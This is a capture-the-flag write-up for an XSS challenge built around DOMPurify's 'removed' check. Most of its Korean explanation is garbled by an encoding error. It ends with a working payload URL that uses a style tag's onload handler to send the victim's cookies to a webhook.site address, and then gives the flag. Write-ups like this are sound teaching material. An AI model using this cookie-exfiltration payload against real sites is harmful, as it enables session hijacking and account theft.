# Description
If nothing is removed, then it is surely safe.
Hint: wait, why <script>1337</script> works???
App: https://mint-chall.fmc.tf/
Admin bot: https://mint-bot.fmc.tf/
Plain Text
๋ณต์ฌ
# ๋ถ์
# File
chall.html
ํด๋น html ํ์ผ์ ํ๋ ์ค๋ค.
DOMPurify๋ฅผ ๋จผ์ ๋ณด๋ฉด ์๋์ ๋งํฌ์์ ์์ค์ฝ๋๋ฅผ ๋ณผ ์ ์๋ค.
์ผ๋จ ๋ญ library์ธ์ง ํ์ธํ๋ฉด ์๋์ ๊ฐ๋ค๊ณ ๋งํด์ค๋ค.
DOMPurify๋ HTML์ ์ ํํ๊ณ XSS ๊ณต๊ฒฉ์ ๋ฐฉ์งํ๋ ์ญํ ์ ํฉ๋๋ค. DOMPurify์ ์ํ ์์๊ฐ ๊ฐ๋ํ โ๋๋ฌ์ดโ HTML ๋ฌธ์์ด์ ๋๊ธฐ๋ฉด, ํน๋ณํ ์ค์ ์ด ์๋ ํ ์์ ํ๊ฒ ์ ์ ๋ HTML ๋ฌธ์์ด์ ๋๋ ค์ค๋๋ค. DOMPurify๋ ์ํํ HTML์ด ํฌํจ๋ ๋ชจ๋ ์์๋ฅผ ์ ๊ฑฐํด XSS ๊ณต๊ฒฉ์ ๋น๋กฏํ ์ฌ๋ฌ ์ ํด ์์๋ฅผ ๋ง์๋
๋๋ค. ๋ํ ์ฒ๋ฆฌ ์๋๋ ๋งค์ฐ ๋น ๋ฆ
๋๋ค. ๋ธ๋ผ์ฐ์ ๊ฐ ์ ๊ณตํ๋ ๊ธฐ์ ์ ํ์ฉํ์ฌ ์ด๋ฅผ XSS ํํฐ๋ก ๋ง๋ค์ด ์ฐ๋ฉฐ, ๋ธ๋ผ์ฐ์ ๊ฐ ๋น ๋ฅผ์๋ก DOMPurify ์ญ์ ๋ ๋นจ๋ฆฌ ๋์ํฉ๋๋ค.
์ผ๋จ ์์ค ์ฝ๋๋ฅผ ๋จผ์ ๋ค์ด๋ก๋ ๋ฐ์์ ๋ถ์์ ์ฝ๊ฐ ์งํํ๊ธฐ ์ํด์ ์๋์ ์ฌ์ดํธ์์ ๋์ผํ ๋ฒ์ ์ DOMPurify๋ฅผ ๋ค์ด๋ฐ์์ค๋ค.
์์ค ์ฝ๋์ ๋์์ ๋๋ต์ ์ผ๋ก ์ดํดํ ๋ค ๋ค์ ๋ฌธ์ ์์ ์ํ๋ ์๊ตฌ ์ฌํญ์ ์ ๋ฆฌํ๋ฉด ์๋์ ๊ฐ๋ค.
1.
p๋ก ๋ค์ด์จ GET Parameter๋ฅผ ๊ฐ์ ธ์์ ๋์ โ
โ์ ๋ถ์ฌ์ค๋ค.
2.
DOMPurify.sanitize ํจ์ ์คํ
3.
DOMPurify.removed.length ์ฆ removed๊ฐ ๋ ๊ฒ์ด ์์ผ๋ฉด xss.innerHTML์ p๋ฅผ ๋ฃ๋๋ค.
innerHTML Bypass
innerHTML์ ๊ฒฝ์ฐ ๊ฑฐ๊ธฐ์ ํฌํจ๋์ด ์๋ <script></script>๋ ์คํ๋์ง ์๋๋ค๊ณ ์๋์ HTML Standard์์ ์ ์๋์ด์๋ค.
When inserted using theย document.write()ย method,ย scriptย elementsย usuallyย execute (typically blocking further script execution or HTML parsing). When inserted using theย innerHTMLย andย outerHTMLย attributes, they do not execute at all.
์ด๋ฅผ ์ฐํํ๊ธฐ ์ํด์๋ <img> ํ๊ทธ์ ๋์ผํ๊ฒ src ์์ฑ์ ์ด์ฉํด์ ์ธ๋ถ๋ก ๋ถํฐ ๋ฐ์ดํฐ๋ฅผ ์์ฒญํ๋ ํ๊ทธ๋ฅผ ์ด์ฉํ๋ ๊ฒ๋ค์ ์ฐพ์์ onerror, onload์ ๊ฐ์ ์์ฑ์ ์ด์ฉํ์ฌ Bypass๊ฐ ๊ฐ๋ฅํ๋ค.
DOMPurify.sanitize Bypass
<script>
let p = ((new URLSearchParams(location.search)).get('p') ?? '')+`๐ฑ`
DOMPurify.sanitize(p)
if(!DOMPurify.removed.length) xss.innerHTML = p
</script>
HTML
๋ณต์ฌ
์ฝ๋์ ํต์ฌ์ ๋ณด๋ฉด xss.innerHTML์ ๋ฃ์ด์ฃผ๋ ๊ฒ์ ์ฐ๋ฆฌ๊ฐ ์
๋ ฅํ p ๊ฐ์ ๋ฃ์ด์ค๋ค.
๋ค์๋งํด DOMPurify.sanitize(p)๋ฅผ ์งํํด๋ DOMPurify.removed.length์ด ๋๋ Tag๋ฅผ ์ฐพ๊ณ ํด๋น Tag์ onload attribute๋ง ์ง์ํ๋์ง ํ์ธํด์ ํด๋น Tag๋ฅผ ์ด์ฉํด์ ๊ณต๊ฒฉ์ ์งํํ๋ฉด ๋๋ค.
DOMPurify.removed.length Bypass
DOMPurify ์์ค ์ฝ๋๋ฅผ ๋ถ์ํ๋ฉด ๋๋ต์ ์ผ๋ก DOMPurify์์ removed๋์ง ์๋ ํ๊ทธ๋ฅผ ์์๋ผ ์ ์๋ค.
๋ํ์ ์ผ๋ก <script>, <style> ํ๊ทธ๊ฐ ์กด์ฌํ๋ค.
โข
<script>
script ํ๊ทธ์ ๊ฒฝ์ฐ onload์ ๊ฐ์ ์์ฑ์ ์ง์ํ์ง ์๋๋ค.
โข
<style>
onload ์์ฑ์ ์ง์ํ๋ค.
# Payload
https://mint-chall.fmc.tf/?p=<style%20onload='location.href=`https://webhook.site/455194c0-8a95-453f-9240-a8498b46151c%3Fq%3D`%2Bbtoa(document.cookie)'></style>
HTML
๋ณต์ฌ
# Flag
FMCTF{a266b251865bb2627f945165a12598aa}
Plain Text
๋ณต์ฌ